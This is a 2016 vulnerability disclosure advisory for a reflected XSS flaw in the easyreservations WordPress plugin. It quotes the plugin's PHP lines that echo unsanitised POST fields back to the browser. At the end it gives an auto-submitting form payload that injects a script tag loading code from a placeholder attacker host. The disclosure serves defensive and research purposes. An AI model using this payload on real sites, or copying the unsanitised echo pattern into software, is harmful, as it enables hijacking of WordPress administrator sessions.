Advisory #: 904
Title: Reflected XSS in wordpress plugin easyreservations v3.5
Author: Larry W. Cashdollar, @_larry0
Date: 2016-02-09
Download Site: https://wordpress.org/plugins/easyreservations
Downloads: 107784
Vendor Notified: 2016-02-09
Export: Json
Vendor Contact: plugins@wordpress.org
Plugin Name: easyreservations
Vulnerability:
There is a reflected XSS vulnerability in the following php code ./easyreservations/easyReservations_admin_main.php: 1413: <td><input type="text" name="name" value="<?php if(isset($_POST['name'])) echo $_POST['name']; ?>" align="middle"></td> 1420: <td><input type="text" id="datepicker" style="width:80px" name="date" value="<?php if(isset($_POST['date'])) echo $_POST['date']; ?>" onchange="easyreservations_send_price_admin();<?php if($overview_options['overview_autoselect'] == 1){ ?>dofakeClick(1);<?php }?>"> <select name="from-time-hour" id="from-time-hour" onchange="easyreservations_send_price_admin();<?php if($overview_options['overview_autoselect'] == 1){ ?>dofakeClick(0);<?php }?>"><?php echo easyreservations_time_options($fromtimeh); ?></select>:<select name="from-time-min"><?php echo easyreservations_num_options("00",59,$fromtimem); ?></select></td> 1427: <td><input type="text" id="datepicker2" style="width:80px" name="dateend" value="<?php if(isset($_POST['dateend'])) echo $_POST['dateend']; ?>" onchange="easyreservations_send_price_admin();changer();<?php if($overview_options['overview_autoselect'] == 1){ ?>dofakeClick(2);<?php }?>"> <select name="to-time-hour" id="to-time-hour" onchange="easyreservations_send_price_admin();<?php if($overview_options['overview_autoselect'] == 1){ ?>dofakeClick(0);<?php }?>"><?php echo easyreservations_time_options($totimeh); ?></select>:<select name="to-time-min"><?php echo easyreservations_num_options("00",59,$totimem); ?></select></td> 1449: <td><input type="text" name="email" value="<?php if(isset($_POST['email'])) echo $_POST['email']; ?>" onchange="easyreservations_send_price_admin();"></td> 1530:<?php if(isset($_POST['room-saver-to'])){ ?><script>jQuery(document).ready(function(){ fakeClick('<?php echo $_POST['room-saver-from']; ?>','<?php echo $_POST['room-saver-to']; ?>','<?php echo $_POST['room']; ?>','<?php echo $_POST['roomexactly']; ?>', '');setVals2(<?php echo $_POST['room'].','.$_POST['roomexactly']; ?>);document.getElementById('datepicker').value='<?php echo date(RESERVATIONS_DATE_FORMAT, $_POST['room-saver-from']); ?>';document.getElementById('datepicker2').value='<?php echo date(RESERVATIONS_DATE_FORMAT, $_POST['room-saver-to']); ?>';easyreservations_send_price_admin();});</script><?php } //Set Room and Roomexactly after click on Overview and redirected to add The variable names room, room-saver-from,email and roomexactly appears to send unsanitized data back to the users browser via POST request.
CVE-ID: Not Released
File:./easyreservations/easyReservations_admin_main.php
Exploit Code:
Exploit was derived from appearance of first vulnerable parameter in code, there could be more shown above.
  1. This is an untested autogenerated exploit:
  2. XSS POST exploit modified from http://blog.portswigger.net/2007/03/exploiting-xss-in-post-requests.html
  3. <form name=TheForm action=http://[target]/wp-content/plugins/easyreservations/easyReservations_admin_main.php method=post> <input type=hidden name=name value=&quot;&gt;&lt;script&#32;src=http://attacker/bad.js&gt;&lt;/script&gt;> </form> <script> document.TheForm.submit(); </script>